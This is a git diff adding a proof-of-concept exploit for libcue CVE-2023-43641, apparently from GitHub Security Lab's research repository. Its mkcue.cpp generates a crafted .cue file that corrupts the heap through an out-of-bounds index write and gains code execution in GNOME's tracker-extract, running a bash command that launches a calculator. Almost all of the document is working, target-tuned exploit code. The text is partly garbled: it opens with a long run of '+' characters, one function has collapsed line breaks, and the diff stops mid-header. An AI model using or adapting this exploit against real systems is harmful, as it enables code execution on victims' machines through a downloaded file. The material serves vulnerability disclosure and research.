+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/mkcue.cpp b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/mkcue.cpp
new file mode 100644
index 0000000..96f3558
--- /dev/null
+++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/mkcue.cpp
@@ -0,0 +1,565 @@
+#include "utils.h"
+#include <assert.h>
+#include <fcntl.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+struct Track {
+  const char *title_;
+  const char *composer_;
+  const char *arranger_;
+  const char *performer_;
+  const char *songwriter_;
+  const char *genre_;
+  const char *message_;
+};
+
+const Track track_fengshui1 = {
+    "Heap Feng Shui: empty the tcache",
+    "Allocate a chunk from tcache index 2 ",
+    "Allocate a chunk from tcache index 4 ",
+    "Allocate a chunk from tcache index 6 "
+    " \n ",
+    "Allocate a chunk from tcache index 7 "
+    " \n ",
+    "Allocate a chunk from tcache index 11 "
+    " \n "
+    " \n ",
+    "The goal here is to ensure that all subsequent allocations come\nfrom a "
+    "large contiguous block of memory. This string allocates a chunk "
+    "from\ntcache index 13. Doing this 14 times guarantees that the tcache is "
+    "empty. ",
+};
+
+const Track track_fengshui2 = {
+    "Repeat Heap Feng Shui ",
+    " ",
+    " ",
+    " "
+    " \n ",
+    " "
+    " \n ",
+    " "
+    " \n "
+    " \n ",
+    " \n "
+    " \n "
+    " ",
+};
+
+const Track track_rickroll = {
+    "Never Gonna Give You Up ",
+    "Rick Astley ",
+    " ",
+    "\nWe're no strangers to love\nYou know the rules and so do I\n "
+    " ",
+    "\nA full commitment's what I'm thinking of\nYou wouldn't get this from "
+    "any other guy\n ",
+    "\nI just want to tell you how I'm feeling\nGotta make you understand\n "
+    " \n "
+    " ",
+    "\nNever gonna give you up, never gonna let you down\nNever gonna run "
+    "around and desert you\nNever gonna make you cry, never gonna say "
+    "goodbye\nNever gonna tell a lie and hurt you\n "
+    " "};
+
+// Calculate the tcache index that will be used for `malloc(size)`.
+size_t calc_tcache_index(size_t size) {
+  if (size < 0x9) {
+    return 0;
+  }
+  return (size - 0x9) / 0x10;
+}
+
+static void write_cdtext(WriteBuf &buf, const size_t tidx, const char *item,
+                         const char *str) {
+  // Confirm that the string is the correct length for the intended tcache
+  // index.
+  const size_t len = strlen(str);
+  const size_t idx = calc_tcache_index(len + 1);
+  if (idx != tidx) {
+    const char *problem = idx < tidx ? "short" : "long";
+    fprintf(stderr,
+            "String is too %s for target tcache index %zu. Actual index: "
+            "%zu.\nString:\n%s\n",
+            problem, tidx, idx, str);
+    exit(EXIT_FAILURE);
+  }
+
+  buf.write_string(item);
+  buf.write_string(" \"");
+  buf.write_string(str);
+  buf.write_string("\"\n");
+}
+
+static void set_index(WriteBuf &buf, int32_t i, uint32_t x) {
+  char str[256];
+  snprintf(str, sizeof(str), "INDEX %u %u\n", (uint32_t)i, x);
+  buf.write_string(str);
+}
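+
+// A worked example of the size-class arithmetic that write_cdtext enforces,
+// assuming x86-64 glibc, where tcache bins are spaced 0x10 bytes apart.
+// A CD-TEXT string of length n is copied with malloc(n + 1), so:
+//
+//   calc_tcache_index(41) == (41 - 9) / 16 == 2
+//   calc_tcache_index(56) == (56 - 9) / 16 == 2
+//   calc_tcache_index(57) == (57 - 9) / 16 == 3
+//
+// i.e. any string with strlen between 40 and 55 is served from tcache
+// index 2. The padded strings in the Track literals above therefore only
+// need to land inside a bin's range, not hit one exact length.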
+static void set_cd_ntrack(WriteBuf &buf, size_t cd_ntrack_offset, + size_t track_offset, size_t target_offset) { + ptrdiff_t i = ((ptrdiff_t)(cd_ntrack_offset - track_offset) - 0x88) / 8; + ptrdiff_t x = ((ptrdiff_t)(target_offset - cd_ntrack_offset) - 0x8) / 8; + if (99 <= x) { + // To compensate for the adjustment that's made in cd_add_track. + x++; + } + set_index(buf, i, x); +} + +static void new_track(WriteBuf &buf, size_t &tracknum) { + char str[256]; + snprintf(str, sizeof(str), "TRACK %.3lu AUDIO\n", tracknum); + tracknum++; + buf.write_string(str); +} + +static void write_complete_track(WriteBuf &buf, size_t &tracknum, + const Track &track) { + new_track(buf, tracknum); + write_cdtext(buf, 1, "TITLE", track.title_); + write_cdtext(buf, 2, "COMPOSER", track.composer_); + write_cdtext(buf, 4, "ARRANGER", track.arranger_); + write_cdtext(buf, 6, "PERFORMER", track.performer_); + write_cdtext(buf, 7, "SONGWRITER", track.songwriter_); + write_cdtext(buf, 11, "GENRE", track.genre_); + write_cdtext(buf, 13, "MESSAGE", track.message_); +} + +static bool is_valid_string_byte(uint8_t x) { return x != 0 && x != '"'; } + +static void create_fake_chunk(WriteBuf &buf, size_t track_offset, + uint16_t offset, uint16_t chunksize) { + char str[256]; + const uint8_t lowbyte = offset & 0xff; + const uint8_t highbyte = offset >> 8; + assert(is_valid_string_byte(lowbyte)); + assert(is_valid_string_byte(highbyte)); + snprintf(str, sizeof(str), + "long string to overwrite low bytes of address " + " %c%c", + lowbyte, highbyte); + write_cdtext(buf, 7, "TITLE", str); + set_index(buf, -(track_offset + 0x90 - offset) / 8, + chunksize); // overwrite size of string chunk + buf.write_string("FILE pwned.mp3 MP3\n"); +} + +enum Target { Ubuntu23_04, Fedora38, NumTargets }; + +static void write_ghsecuritylab_track(WriteBuf &buf, size_t &tracknum, + Target target) { + Track track = { + "Copyright (c) 2023 GitHub, Inc.", + "[GitHub Security Lab](https://securitylab.github.com/)", + 0, + "[Kevin Backhouse](https://github.com/kevinbackhouse) " + "\n ", + " " + "\n ", + "[The Malloc " + "Maleficarum](https://seclists.org/bugtraq/2005/Oct/118).\nSee also: " + "[how2heap](https://github.com/shellphish/how2heap).\n " + " ", + "Proof-of-concept exploit for libcue CVE-2023-43641 (GHSL-2023-197): out " + "of bounds\narray access in track_set_index. The vulnerability is used " + "to get code execution in GNOME's\ntracker-extract. 
Download this file " + "to pop a calc.", + }; + + char arranger[80]; + const char *targetnames[NumTargets] = {"Ubuntu 23.04 (Lunar Lobster)", + "Fedora 38"}; + snprintf(arranger, sizeof(arranger), + "\nThis version of the poc is tuned for %s " + " ", + targetnames[target]); + arranger[71] = '\n'; + arranger[72] = '\0'; + + track.arranger_ = arranger; + write_complete_track(buf, tracknum, track); +} + +Target select_target(const char *target) { + if (strcmp(target, "Ubuntu23_04") == 0) { + return Ubuntu23_04; + } + if (strcmp(target, "Fedora38") == 0) { + return Fedora38; + } + fprintf(stderr, "Target not recognized: %s\n", target); + exit(EXIT_FAILURE); +} + +int main(int argc, char *argv[]) { + const uint16_t chunksize_track = 0x3b5; + const size_t rawbuf_len = 0x10000 - 0x20; + uint8_t *rawbuf = (uint8_t *)malloc(rawbuf_len); + size_t tracknum = 0; + size_t track_offset = 0; + + if (argc != 2) { + fprintf(stderr, "usage: \nmkcue Ubuntu23_04\nmkcue Fedora38\n"); + return EXIT_FAILURE; + } + + const Target target = select_target(argv[1]); + + const size_t cd_ntracks_offsets[NumTargets] = {0x12608, 0x12868}; + const size_t cd_ntrack_offset = cd_ntracks_offsets[target]; + + WriteBuf buf(rawbuf, rawbuf_len); + + buf.write_string("PERFORMER Kev\n"); + write_cdtext(buf, 0, "TITLE", "Kev'z Warez"); + buf.write_string("FILE pwned.mp3 MP3\n"); + + buf.write_string("\n"); + new_track(buf, tracknum); + write_cdtext(buf, 15, "MESSAGE", + "First some [heap feng " + "shui](https://en.wikipedia.org/wiki/Heap_feng_shui):\nallocate " + "memory so that all subsequent allocations come from a " + "continguous block of\nmemory. For example, this string is 251 " + "characters long to use a chunk from tcache\nindex 15."); + + // Use more memory. + new_track(buf, tracknum); + write_cdtext(buf, 5, "TITLE", + "A Track is 0x3a8 bytes, so creating many new tracks is a quick " + "way to use lots of memory."); + + for (size_t i = 0; i < 31; i++) { + new_track(buf, tracknum); + write_cdtext(buf, 5, "TITLE", + "Again " + " "); + } + + buf.write_string("\n"); + write_complete_track(buf, tracknum, track_fengshui1); + buf.write_string("\n"); + write_ghsecuritylab_track(buf, tracknum, target); + buf.write_string("\n"); + write_complete_track(buf, tracknum, track_rickroll); + for (size_t i = 0; i < 11; i++) { + write_complete_track(buf, tracknum, track_fengshui2); + } + + new_track(buf, tracknum); + const size_t offsets1[NumTargets] = {0x17f00, 0x18200}; + track_offset = offsets1[target]; + write_cdtext(buf, 1, "TITLE", "for freeing to tcache index 1"); + write_cdtext(buf, 0, "TITLE", "free previous title"); + + // Overwrite cd->ntrack so that the next track pointer will be + // written to offset 0xd50. + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, 0xd50); + + new_track(buf, tracknum); + const size_t offsets2[NumTargets] = {0x184b0, 0x187b0}; + track_offset = offsets2[target]; + write_cdtext(buf, 1, "TITLE", "Allocate previously freed string"); + set_index(buf, -0x1c, 0x95); // overwrite size of string chunk + + // This overwrites cd->ntrack. Every time a new track is allocated, + // its address is written to cd->track[cd->ntrack - 1]. The value + // of cd->ntrack is also incremented each time. I want to use this + // on the 5th new_track after this point, to overwrite offset + // 0xdd0 because that's going to be the location of my g_class struct + // and I need to set its g_type field. 
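+  // (The target passed here is 0xdb0 rather than 0xdd0 because each
+  // new_track advances the location of the pointer write by 8 bytes:
+  // the 5th track pointer therefore lands at 0xdb0 + 4 * 8 == 0xdd0.)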
+ set_cd_ntrack(buf, cd_ntrack_offset, track_offset, 0xdb0); + + // Use a fake chunk to overwrite the low bytes of info->file + // so that it points to offset 0xd50, which is where I'll create + // the fake file struct. + create_fake_chunk(buf, track_offset, 0xcf0, 0x45); + write_cdtext(buf, 2, "GENRE", + "set low bytes of info->file \x50\x0d"); + + // Use a fake chunk to overwrite the low bytes of info->file->g_class + // so that it points to offset 0xdd0, which is where I'll create + // the fake g_class + create_fake_chunk(buf, track_offset, 0xd30, 0x35); + write_cdtext(buf, 1, "PERFORMER", "set low bytes of file->g_class \xd0\x0d"); + + set_index(buf, -(track_offset + 0x88 - 0xd10) / 8, 0); // info->resource = 0 + + // Fake chunk for overwriting the lower bytes of info->file->g_class (later). + create_fake_chunk(buf, track_offset, 0xf10, 0x55); + + // Fake chunk for overwriting the tcache (immediately below). + create_fake_chunk(buf, track_offset, 0x9b0, 0x45); + + // Create a fake chunk at offset 0xe20, then overwrite its lower bytes in + // the tcache to change it to 0xe60. The chunk size (0x115) is chosen so + // it is stored in tcache->entries[15] (offset 0x9d8), which means that I + // can overwrite its lower bytes by writing a string to the fake chunk at + // offset 0x9b0. + const uint16_t chunksize_e60 = 0x115; + create_fake_chunk(buf, track_offset, 0xe20, chunksize_e60); + + write_cdtext(buf, 2, "MESSAGE", + "set low bytes of tcache->entries[15] \x60\x0e"); + write_cdtext(buf, 0, "MESSAGE", "kevwozere"); + + // Create a fake chunk at offset 0xdd0. + create_fake_chunk(buf, track_offset, 0xdd0, 0x55); + + // track->file.start is at offset 0x30 in track + // track->file.length is at offset 0x38 in track + // track->index[0] is at offset 0x88 in track + // track->zero_pre.length is at offset 0x18 in track + // + // Series of calculations: + // + // prev_track->file.length = X - prev_track->file.start + // track->zero_pre.length = Y - track->index[0] + // + // So I want to prev_track->file.length and track->index[0] to be + // at the same address. Which means: + // + // prev_track + 0x38 == track + 0x88 + // + // In other words: track == prev_track - 0x50 + + // Create a fake track-sized chunk at offset 0xde0. + create_fake_chunk(buf, track_offset, 0xde0, chunksize_track); + + // Create a fake track-sized chunk at offset 0xe30. + create_fake_chunk(buf, track_offset, 0xe30, chunksize_track); + + write_cdtext(buf, 15, "TITLE", + "long title to allocate 0x110-sized chunk. 
" + " " + " " + " "); + new_track(buf, tracknum); // Allocate a track at offset 0xe30 + set_index(buf, -0x35, 0); // info->resource = 0 + set_index(buf, -0x31, 1); // info->ref_count = 1 + set_index(buf, -0x2a, 0); // self->launcher = 0 + set_index(buf, -0x29, 0); // self->flags = 0 + + new_track(buf, tracknum); // Allocate a track at offset 0xde0 + track_offset = 0xde0; + + write_cdtext( + buf, 3, "TITLE", + "Overwrite low bytes of track->file.name \x60\x0e"); + set_index(buf, -2, chunksize_e60); + buf.write_string("FILE \"wen poc?\" MP3\n"); + + // Create a fake track-sized chunk at offset 0xee0 + write_cdtext( + buf, 3, "TITLE", + "Overwrite low bytes of track->file.name \xe0\x0e"); + set_index(buf, 0xe, chunksize_track); + buf.write_string("FILE pwned.mp3 MP3\n"); + + // Create a fake track-sized chunk at offset 0xf30 + write_cdtext( + buf, 3, "TITLE", + "Overwrite low bytes of track->file.name \x30\x0f"); + set_index(buf, 0x18, chunksize_track); + buf.write_string("FILE pwned.mp3 MP3\n"); + + // Create a fake 0x30-sized chunk at offset 0xdb0. It will be used later to + // overwrite the pointer to the g_type stored at offset 0xdd0 (element 0 of + // the g_class). + write_cdtext( + buf, 3, "TITLE", + "Overwrite low bytes of track->file.name \xb0\x0d"); + set_index(buf, -0x18, 0x35); + buf.write_string("FILE pwned.mp3 MP3\n"); + + // Use the two overlapping tracks to apply arithmetic + set_index(buf, 0, -1); // reset prev_track->file.length + set_index(buf, 1, 0); + const size_t codeoffsets1[NumTargets] = {0x1cdff0, 0x1cae20}; + set_index(buf, 1, codeoffsets1[target]); // Offset from + // g_file_input_stream_real_query_info_finish + // to g_option_context_parse + + set_index(buf, 0xe, 0); // Zero a field that causes a crash in gatomicarray.c + + new_track(buf, tracknum); // Allocate a track at offset 0xf30 + buf.write_string("FLAGS\n"); // The grammar requires at least one track + // statement between tracks + new_track(buf, tracknum); // Allocate a track at offset 0xee0 + track_offset = 0xee0; + + buf.write_string( + "ISRC " + "looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo" + "oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo" + "oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooog-" + "string-to-allocate-0x110-sized-chunk\n"); + // Allocate 0x50-sized chunk at offset 0xf10. + write_cdtext(buf, 3, "TITLE", + "long title to overwrite low bytes of track->isrc " + " \x60\x0f"); + set_index(buf, -2, 0x115); + buf.write_string("ISRC short-string\n"); + + set_index(buf, 0, -1); // reset prev_track->file.length + set_index(buf, 1, 0); + const size_t codeoffsets2[NumTargets] = {0x3b290, 0x3d290}; + set_index(buf, 1, codeoffsets2[target]); // Offset from + // g_file_input_stream_real_query_info_finish + // to initable_init + + // Zero the tcache + set_index(buf, -0xd0, 0); + set_index(buf, -0xce, 0); + + set_index(buf, -0x19, 100); // info->file->g_class->g_type->ref_count = 100 + set_index(buf, -0x17, 0); // info->file->g_class->g_type->nsupers = 0 + set_index(buf, -0x10, 0x50); // info->file->g_class->g_type->supers[0] = 0x50 + + new_track(buf, tracknum); // write a pointer to 0xdd0 + const size_t offsets3[NumTargets] = {0x19290, 0x19590}; + track_offset = offsets3[target]; + + // Overwrite cd->ntrack so that the next track pointer will get written + // to offset 0xeb8 (the location of cancellable->priv) + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, 0xeb8); + new_track(buf, tracknum); // This track is cancellable->priv. 
+ const size_t offsets4[NumTargets] = {0x197f0, 0x19af0}; + track_offset = offsets4[target]; + set_index(buf, -0x11, 0); // cancellable->priv->cancelled = 0 + + // Overwrite cd->ntrack so that the next track pointer will get written + // to offset 0xd78 (the location of self->argv) + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, 0xd78); + new_track(buf, tracknum); // This track is the argv array. (offset 0x19d50) + const size_t offsets5[NumTargets] = {0x19d50, 0x1a050}; + track_offset = offsets5[target]; + const size_t argv_offset = track_offset; + set_index(buf, -0xe, 0); // argv[3] = 0 + + // Overwrite cd->ntrack so that the next track pointer will get written + // to offset 0x19d50 (the location of self->argv[0]) + set_cd_ntrack(buf, cd_ntrack_offset, argv_offset, argv_offset); + write_cdtext(buf, 6, "TITLE", + "Temporary long title for tcache index 6 " + " "); + write_cdtext(buf, 0, "TITLE", "short title"); + new_track(buf, tracknum); // this will be argv[0] (offset 0x1a350) + const size_t offsets6[NumTargets] = {0x1a350, 0x1a650}; + track_offset = offsets6[target]; + write_cdtext(buf, 6, "TITLE", + "Use long title from tcache index 6 " + " "); + set_index(buf, -0x26, 0xc5); // overwrite size of string chunk + write_cdtext(buf, 10, "TITLE", + " " + " " + " /bin/bash"); + + // Overwrite cd->ntrack so that the next track pointer will get written + // to offset 0x19d58 (the location of self->argv[1]) + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, argv_offset + 0x8); + + new_track(buf, tracknum); // This track is argv[1]. (offset 0x1a8b0) + const size_t offsets7[NumTargets] = {0x1a8b0, 0x1abb0}; + track_offset = offsets7[target]; + uint32_t x = 0; + strcpy((char *)&x, "-c"); + set_index(buf, -0x11, x); + + // Overwrite cd->ntrack so that the next track pointer will get written + // to offset 0x19d60 (the location of self->argv[2]). + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, argv_offset + 0x10); + + write_cdtext(buf, 6, "TITLE", + "Temporary long title for tcache index 6 " + " "); + write_cdtext(buf, 0, "TITLE", "eta son"); + new_track(buf, tracknum); // this will be argv[2] + write_cdtext(buf, 6, "TITLE", + "Use long title from tcache index 6 " + " "); + set_index(buf, -0x26, 0x165); // overwrite size of string chunk + write_cdtext( + buf, 20, "TITLE", + "This command is going to get called repeatedly in an infinite loop, so " + "send SIGSTOP to avoid a fork-bomb and use flock so only one calculator " + "starts. killall -SIGSTOP tracker-extract-3; flock -w 3 " + "~/Downloads/pwned.lock -c 'gnome-calculator -e 1337' && (sleep 10; rm " + "~/Downloads/pwned.lock; killall -SIGKILL tracker-extract-3)"); + + // To stop tracker-extract from crashing in g_option_context_parse + // immediately after it is has called initable_init, overwrite the + // next pointer of context->groups to add another link to the linked + // list, and point the next pointer back to offset 0xdd0 to create + // an infinite list. The loop will keep spinning until we have + // a chance to kill tracker-extract cleanly. + const size_t offsets8[NumTargets] = {0x1aeb0, 0x1b1b0}; + track_offset = offsets8[target]; + + // Overwrite cd->ntrack so that the next track pointer will be + // written to offset 0xdd8. 
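+  // (0xdd8 is offset 0x8 within the fake list node at 0xdd0, i.e. its
+  // 'next' field, so the track allocated below is spliced in as the next
+  // link of the infinite list described above.)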
+  set_cd_ntrack(buf, cd_ntrack_offset, track_offset, 0xdd8);
+
+  write_cdtext(buf, 6, "PERFORMER",
+               "Temporary long name for tcache index 6                      "
+               "              "
+               "                                    ");
+  write_cdtext(buf, 0, "PERFORMER", "short name");
+
+  new_track(buf, tracknum); // This will be another link in context->groups
+  const size_t offsets9[NumTargets] = {0x1b4b0, 0x1b7b0};
+  track_offset = offsets9[target];
+  const size_t link_offset = track_offset;
+
+  // Overwrite cd->ntrack so that the next track pointer will be
+  // written to offset 0x8 within the current track.
+  set_cd_ntrack(buf, cd_ntrack_offset, track_offset, link_offset + 8);
+
+  write_cdtext(buf, 6, "TITLE",
+               "Use chunk from tcache index 6                               "
+               "              "
+               "                                    ");
+  set_index(buf, -0x26, 0xc5); // overwrite size of string chunk
+  write_cdtext(buf, 0, "TITLE", "short title");
+
+  // The only purpose of this track is to write a pointer at offset 0x8 in
+  // the previous track. I'll overwrite the bottom bytes of that pointer so
+  // that it points to offset 0xdd0.
+  new_track(buf, tracknum);
+  const size_t offsets10[NumTargets] = {0x1ba30, 0x1bd30};
+  track_offset = offsets10[target];
+
+  // Overwrite cd->ntrack so that the next track pointer will be
+  // written to offset 0x0 within the previous track.
+  set_cd_ntrack(buf, cd_ntrack_offset, track_offset, link_offset);
+  write_cdtext(buf, 10, "TITLE",
+               "                                                            "
+               "                                                            "
+               "                                                     \xd0\x0d");
+
+  tracknum = 1337;
+  new_track(buf, tracknum); // fake GOptionGroup
+  set_index(buf, -0x6, 0);  // zero the pre_parse_func field
+
+  write_cdtext(buf, 2, "TITLE",
+               "Use the chunk that is still in tcache index 2");
+  write_cdtext(buf, 1, "MESSAGE", "pop that calc                \xa0\x0e");
+  buf.write_string("REM DATE \"1992 AD\"\n");
+
+  // Pad the file with newline characters.
+  buf.write_many('\n', rawbuf_len - buf.offset());
+
+  buf.write_to_fd(STDOUT_FILENO);
+  free(rawbuf);
+
+  return 0;
+}
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/search-bar-screenshot.png b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/search-bar-screenshot.png
new file mode 100644
index 0000000..c4f1e3c
Binary files /dev/null and b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/search-bar-screenshot.png differ
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.cpp b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.cpp
new file mode 100644
index 0000000..a300524
--- /dev/null
+++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.cpp
@@ -0,0 +1,97 @@
+#include "utils.h"
+#include <assert.h>
+#include <string.h>
+#include <unistd.h>
+
+// Write a uint8_t to starting address &buf_[pos].
+size_t WriteBuf::write_uint8_at(size_t pos, uint8_t x) {
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= sizeof(uint8_t));
+  buf_[pos++] = x;
+  return pos;
+}
+
+// Write a uint16_t to starting address &buf_[pos] (in big endian
+// order).
+size_t WriteBuf::write_uint16_at(size_t pos, uint16_t x) {
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= sizeof(uint16_t));
+  buf_[pos++] = (x >> 8) & 0xFF;
+  buf_[pos++] = x & 0xFF;
+  return pos;
+}
+
+// Write a uint32_t to starting address &buf_[pos] (in big endian
+// order).
+size_t WriteBuf::write_uint32_at(size_t pos, uint32_t x) {
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= sizeof(uint32_t));
+  buf_[pos++] = (x >> 24) & 0xFF;
+  buf_[pos++] = (x >> 16) & 0xFF;
+  buf_[pos++] = (x >> 8) & 0xFF;
+  buf_[pos++] = x & 0xFF;
+  return pos;
+}
+
+// Write n copies of the byte x to starting address &buf_[pos].
+size_t WriteBuf::write_many_at(size_t pos, uint8_t x, size_t n) {
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= n);
+  memset(&buf_[pos], x, n);
+  pos += n;
+  return pos;
+}
+
+// Write a block of n bytes to starting address &buf_[pos].
+size_t WriteBuf::write_bytes_at(size_t pos, const uint8_t *bytes, size_t n) {
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= n);
+  memcpy(&buf_[pos], bytes, n);
+  pos += n;
+  return pos;
+}
+
+// Write a uint8_t to starting address &buf_[offset_].
+void WriteBuf::write_uint8(uint8_t x) { offset_ = write_uint8_at(offset_, x); }
+
+// Write a uint16_t to starting address &buf_[offset_] (in big endian
+// order).
+void WriteBuf::write_uint16(uint16_t x) {
+  offset_ = write_uint16_at(offset_, x);
+}
+
+// Write a uint32_t to starting address &buf_[offset_] (in big endian
+// order).
+void WriteBuf::write_uint32(uint32_t x) {
+  offset_ = write_uint32_at(offset_, x);
+}
+
+// Write n copies of the byte x to starting address &buf_[offset_].
+void WriteBuf::write_many(uint8_t x, size_t n) {
+  offset_ = write_many_at(offset_, x, n);
+}
+
+// Write n bytes to starting address &buf_[offset_].
+void WriteBuf::write_bytes(const uint8_t *bytes, size_t n) {
+  offset_ = write_bytes_at(offset_, bytes, n);
+}
+
+// Write a string to starting address &buf_[offset_].
+void WriteBuf::write_string(const char *str) {
+  write_bytes(reinterpret_cast<const uint8_t *>(str), strlen(str));
+}
+
+size_t WriteBuf::offset() const { return offset_; }
+
+// Inserts an n-byte gap, so that the bytes can be written later. This is
+// usually used for size or offset fields that need to be calculated
+// later.
+size_t WriteBuf::insert_gap(size_t n) {
+  const size_t pos = offset_;
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= n);
+  offset_ = pos + n;
+  return pos;
+}
+
+void WriteBuf::write_to_fd(int fd) { write(fd, buf_, offset_); }
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.h b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.h
new file mode 100644
index 0000000..ce595d7
--- /dev/null
+++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.h
@@ -0,0 +1,57 @@
+#include <stddef.h>
+#include <stdint.h>
+
+class WriteBuf {
+  uint8_t* buf_;
+  const size_t bufsize_;
+  size_t offset_ = 0;
+
+public:
